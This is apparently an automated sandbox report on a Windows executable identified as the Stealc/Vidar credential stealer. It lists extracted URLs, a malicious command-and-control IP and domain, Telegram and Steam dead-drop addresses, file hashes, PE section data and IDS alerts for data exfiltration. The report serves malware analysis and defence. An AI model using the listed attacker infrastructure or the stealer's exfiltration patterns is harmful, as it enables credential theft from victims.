https://web.telegram.org	random(2).exe, 00000000.00000003.1079632033.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1096240844.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1110484696.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr	wt26ph.0.dr	false		high
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 0000000C.00000003.2415004575.00003CCC01544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2415297744.00003CCC01614000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	chrome.exe, 0000000C.00000002.2655346363.00000249DACD7000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg	wt26ph.0.dr	false		high
https://lens.google.com/gen204	chrome.exe, 0000000C.00000003.2419271192.00003CCC0176C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199832267488dqu220Mozilla/5.0	random(2).exe, 00000000.00000003.1061579899.00000000047F0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/tools/feedback/chrome/__submit	chrome.exe, 0000000C.00000002.6585183116.00003CCC0053D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199832267488	random(2).exe, 00000000.00000003.1061579899.00000000047F0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700	wt26ph.0.dr	false		high
https://calendar.google.com	chrome.exe, 0000000C.00000003.2419271192.00003CCC0176C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2418998130.00003CCC0174C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi	wt26ph.0.dr	false		high
https://fonts.google.com/icons?selected=Material	chrome.exe, 0000000C.00000003.2420626371.00003CCC01898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2420162161.00003CCC01848000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2420798445.00003CCC017AC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)	chrome.exe, 0000000C.00000002.5846593062.00003CCC000DC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta	wt26ph.0.dr	false		high
https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://clients4.google.com/chrome-sync/event	chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ogs.google.com	chrome.exe, 0000000C.00000002.5805027972.00003CCC00068000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/imghp?hl	chrome.exe, 0000000C.00000002.5871320655.00003CCC00128000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	chrome.exe, 0000000C.00000003.2415297744.00003CCC01614000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/search	chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/update2/response	chrome.exe, 0000000C.00000002.2655107307.00000249DAA8D000.00000004.08000000.00040000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64	wt26ph.0.dr	false		high
https://myaccount.google.com/shielded-email?utm_source=chrome2B	chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/glic/intro?20	chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-query.fastly-edge.com/	chrome.exe, 0000000C.00000003.2376583988.00003CC8005DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google.com/	chrome.exe, 0000000C.00000002.5771387251.00003CCC00004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/	chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K	chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	wt26ph.0.dr	false		high
https://google-ohttp-relay-join.fastly-edge.com/2J	chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://m.google.com/devicemanagement/data/api	chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.comAccess-Control-Allow-Credentials:	chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.office.com/calendar/	chrome.exe, 0000000C.00000003.2419271192.00003CCC0176C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2418998130.00003CCC0174C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n	chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/glic2	chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/	chrome.exe, 0000000C.00000002.6005702865.00003CCC001AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ssl.google.cmanager.com	chrome.exe, 0000000C.00000002.6206613229.00003CCC002D8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://csp.withgoogle.com/csp/report-to/gws/none	chrome.exe, 0000000C.00000002.6598026417.00003CCC00550000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/	chrome.exe, 0000000C.00000003.2415297744.00003CCC01614000.00000004.00000800.00020000.00000000.sdmp	false		high
https://clients4.google.com/chrome-sync	chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.164	www.google.com	United States	15169	GOOGLEUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
78.47.63.132	y.p.formaxprime.co.uk	Germany	24940	HETZNER-ASDE	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1643067
Start date and time:	2025-03-19 13:59:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	random(2).exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@34/1@4/4
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Max analysis timeout: 600s exceeded, the analysis took too long
Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.184.206, 142.250.186.99, 142.250.186.110, 173.194.76.84, 216.58.212.142, 142.250.185.238, 142.250.186.142, 20.12.23.50, 23.60.203.209, 20.189.173.26
Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, self.events.data.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target random(2).exe, PID 6980 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
09:00:38	API Interceptor	31464405x Sleep call for process: random(2).exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.99	http://45.142.208.144.sslip.io/blog/	Get hash	malicious	Unknown	Browse	telegram.org/img/emoji/40/F09F9889.png
	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
78.47.63.132	NWpNjnx.exe1.exe	Get hash	malicious	Vidar	Browse
	random.exe1.exe	Get hash	malicious	Vidar	Browse
	6xdW3oRY63.exe	Get hash	malicious	Amadey, DarkVision Rat, LummaC Stealer, Vidar	Browse
	qdS0ohqZBN.exe	Get hash	malicious	Vidar	Browse
	FNLJD8Q3.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	work.js	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse
	v7942.exe	Get hash	malicious	Stealc, Vidar	Browse
	ngbtiladkrthgad.exe	Get hash	malicious	Vidar	Browse
	TEDGRQXB.exe	Get hash	malicious	Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	Spacey Sun 11.12.411 (1).exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	https://inkton.xyz	Get hash	malicious	Unknown	Browse	104.18.2.38
	DEVM28.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	CompiledProject.exe.bin.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	NWpNjnx.exe1.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	random.exe1.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	6xdW3oRY63.exe	Get hash	malicious	Amadey, DarkVision Rat, LummaC Stealer, Vidar	Browse	149.154.167.99
	qdS0ohqZBN.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	9uB9RDznXl.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	imv-corp(ref0467) #U3010#U6ce8#U6587#U66f8#U3011sales Agreement WP2501001152 WP2501001159.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Spacey Sun 11.12.411 (1).exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	https://inkton.xyz	Get hash	malicious	Unknown	Browse	149.154.167.99
	SecuriteInfo.com.Win32.MalwareX-gen.16427.1083.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rPedidoCota____oPC250009846.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	MM-7925-0224_110_AD.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.MalwareX-gen.10462.29769.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	1.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	DEVM28.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	rInstrument_bms_docx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
HETZNER-ASDE	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	Spacey Sun 11.12.411 (1).exe	Get hash	malicious	Vidar	Browse	94.130.189.58
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	https://teal-tamqrah-17.tiiny.io/1742248641265	Get hash	malicious	Unknown	Browse	144.76.124.123
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	https://learn.empowerskill.org/	Get hash	malicious	Unknown	Browse	78.46.12.250

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Spacey Sun 11.12.411 (1).exe	Get hash	malicious	Vidar	Browse	149.154.167.99 78.47.63.132
	a.cmd	Get hash	malicious	GuLoader, Remcos	Browse	149.154.167.99 78.47.63.132
	01903025ZW-BP001.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.99 78.47.63.132
	Invio Ordine accompagnatorio n. 20250319-70611 del 03192025 - C.E.F. Srl.js	Get hash	malicious	AgentTesla	Browse	149.154.167.99 78.47.63.132
	BSKDh.98374.10.exe	Get hash	malicious	Unknown	Browse	149.154.167.99 78.47.63.132
	BSKDh.98374.10.exe	Get hash	malicious	Unknown	Browse	149.154.167.99 78.47.63.132
	Objedn#U00e1vka (PO).exe	Get hash	malicious	FormBook, GuLoader	Browse	149.154.167.99 78.47.63.132
	New Purchase Order.exe	Get hash	malicious	MSIL Logger, MassLogger RAT, XRed	Browse	149.154.167.99 78.47.63.132
	aJODAZPOfw.dll	Get hash	malicious	Latrodectus	Browse	149.154.167.99 78.47.63.132
	HSUa315AJm.dll	Get hash	malicious	Latrodectus	Browse	149.154.167.99 78.47.63.132

Process:	C:\Users\user\Desktop\random(2).exe
File Type:	ASCII text, with very long lines (1808), with CRLF line terminators
Category:	dropped
Size (bytes):	10489
Entropy (8bit):	5.49400008804932
Encrypted:	false
SSDEEP:	192:HnBRNC3YbBp6lR1+PaX56/x8lSz9/3/OHNBw8DXSl:Oee1M/xbUPwO0
MD5:	C285AF56A69C639A033B77359FEDE8A7
SHA1:	676A4F90E2ED82CB9ABEE7DAFC3A25D984B380EE
SHA-256:	ECF63A7733385EB825D49B5B351C0687E383F309D6849BE1C7AC06A1CD4E94B2
SHA-512:	53ABAF224CE47D77A6883AFCE25089C12D8362B4BCC01D94F94DF846C9F24AAFB2004502B7E3D5DC512E764B1EFB0B0E1FFC39FA5A423F82EA4E61B83E4E292E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "ecedec8f-7097-47fc-a9e3-d74f0c8e2503");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696499493);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696499494);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9442402156294
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	random(2).exe
File size:	1'822'720 bytes
MD5:	5e941e7c271e85093cb8344fb7cab50b
SHA1:	7a1f977cfd43da7dec3acfd45fcfea91f3acb76c
SHA256:	51c583db2595a3aefa45efaa70c8f0cc1394c18549746bc9fe654fedb9d17e57
SHA512:	cdb456a668820c3437261c8353945420bb66c99f982909152f7fe1c0e87d8b563353a7d50131c66ec870fe7523e02861f6885a60b0a25fb23c43aaa296c9fd5f
SSDEEP:	49152:nJ8+d3JCptdgyTPoluHZe7+MCpOPiDzzC8KG3HG:Jld3Ep7FTAA5e7+vpaZlG
TLSH:	2D8533032913A596E1640FFB33A36B177762564BA115382FDE2E5C2A9E2FF1D7C014CA
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.....................d....... H...........@..........................PH.....C.......................................U...i..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x882000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x67BBFA01 [Mon Feb 24 04:48:01 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F2944892D2Ah
stmxcsr dword ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x28055	0x69	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x27000	0x40c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x281f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x26000	0xec00	7f989802d7e7d6b457ced4c3233180fd	False	0.9982289459745762	data	7.97802160630939	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x27000	0x40c	0x400	f9f43cdd41618b54301677af7d36dbcf	False	0.4853515625	data	4.186032850312854	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x28000	0x1000	0x200	299e32f9c8f003ccfc3eeaceaa2dbd9b	False	0.150390625	data	1.0253754142196863	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x29000	0x2ad000	0x200	fae5c1c480b358846f8f1ff0c3e6c9e0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xyhrtgkn	0x2d6000	0x1ab000	0x1aa400	f473938a3584b8522505cb31225eb071	False	0.9948176319648094	data	7.955289387133198	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
atwyfmcm	0x481000	0x1000	0x600	1256cb851b004524a5e2185195d72a00	False	0.5384114583333334	data	4.855743039337339	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x482000	0x3000	0x2200	2a9a8e0f340a1b86b6baafb395eadb7a	False	0.06020220588235294	DOS executable (COM)	0.782857907341733	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x47fe84	0x256	ASCII text, with CRLF line terminators			0.5100334448160535
RT_MANIFEST	0x4800da	0x143	XML 1.0 document, ASCII text	English	United States	0.628482972136223

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-19T14:00:14.506040+0100	2859378	ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2	1	192.168.2.10	49683	78.47.63.132	443	TCP
2025-03-19T14:00:17.957230+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	78.47.63.132	443	192.168.2.10	49685	TCP
2025-03-19T14:00:20.590290+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1	1	192.168.2.10	49686	78.47.63.132	443	TCP
2025-03-19T14:00:20.590469+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	78.47.63.132	443	192.168.2.10	49686	TCP
2025-03-19T14:00:28.067428+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.10	49694	78.47.63.132	443	TCP
2025-03-19T14:02:16.338105+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.10	49699	78.47.63.132	443	TCP
2025-03-19T14:02:16.739083+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.10	49700	78.47.63.132	443	TCP
2025-03-19T14:02:16.739083+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.10	49700	78.47.63.132	443	TCP
2025-03-19T14:02:17.804395+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.10	49701	78.47.63.132	443	TCP
2025-03-19T14:02:17.804395+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.10	49701	78.47.63.132	443	TCP
2025-03-19T14:02:19.840485+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.10	49702	78.47.63.132	443	TCP
2025-03-19T14:02:19.840485+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.10	49702	78.47.63.132	443	TCP

Network Port Distribution

Total Packets: 231
• 443 (HTTPS)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 19, 2025 14:00:10.099358082 CET	49681	443	192.168.2.10	149.154.167.99
Mar 19, 2025 14:00:10.099421024 CET	443	49681	149.154.167.99	192.168.2.10
Mar 19, 2025 14:00:10.099515915 CET	49681	443	192.168.2.10	149.154.167.99
Mar 19, 2025 14:00:10.109301090 CET	49681	443	192.168.2.10	149.154.167.99
Mar 19, 2025 14:00:10.109318972 CET	443	49681	149.154.167.99	192.168.2.10
